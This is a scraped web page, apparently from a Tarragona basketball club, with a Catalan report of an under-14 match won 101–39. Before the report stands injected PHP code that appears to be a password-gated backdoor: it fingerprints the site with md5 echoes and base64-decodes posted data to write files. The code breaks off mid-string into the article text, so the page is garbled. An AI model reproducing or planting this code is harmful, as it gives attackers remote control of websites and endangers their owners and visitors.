function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Triomf d'autoritat Lila! (101-39) -

Triomf d’autoritat Lila! (101-39)

Updated: febrer 3, 2023

L’Infantil masculí 09A va finalitzar la primera volta de la lliga amb una altra victòria contundent contra un UE Sant Cugat molt combatiu però amb pocs efectius per fer front a un partit amb molt de ritme.

La sortida local va ser fulgurant amb un parcial 6-0 al primer minut, va continuar amb un intercanvi de cistelles per finalitzar el quart amb un altre parcial de 13-0 els últims 4 minuts.

El rival, tot i comptar amb només 7 efectius, va jugar de forma molt ordenada, agressiva i amb molt de ritme, però finalment, la diferència física va ser clau per trencar el partit en la sortida del 2n quart amb un parcial de 18-2.

Els tarragonins van desplegar els millors minuts de la temporada pe que fa a joc coral. Durant molts moments van compartir la pilota amb molta velocitat i es van poder veure grans accions ofensives.

L’aspecte que han de millorar moltíssim és el percentatge de tirs lliures, ja que finalitzen la primera volta amb un pobre 42%. Per altra banda, els del TGN Bàsquet Club són el segon equip més anotador (96 punts pel partit) per darrere del líder indiscutible Barça B.

Aquest dissabte jugaran la primera jornada de la 2a volta contra el Badalona Bàsquet Club a les 11.00 hores al Pavelló del Sagrat Cor.

JORNADA 15
TGN BÀSQUET 09A 101 – UE SANT CUGAT NEGRE 39
Parcials: 26-12, 24-6, 24-9, 27-12

TGN BÀSQUET 09A: De Leon G (4), Arjona A (10), Alfonso M (6), Piñol D (10), Aragonès A (16)
— Cinc inicial – Fontanilles B (Lesionat), Santana M (8), Pulido E (6), Zanardi A (lesionat),
Barroso F (18), Arroyo (14), Llivería M (9) LES XIFRES DEL PARTIT: 5/19 Tirs Lliures | Triples 2: Arjona (2) | 21 faltes.

UE SANT CUGAT NEGRE: Ameida C (4), Morillo X (7), Blecua A (16), Maldonado M(4),
Fernandez P(4) – cinc inicial – Garcia G (2), Martin H (2) LES XIFRES DEL PARTIT: 11/24 Tirs Lliures | Triples 0 | 11 faltes.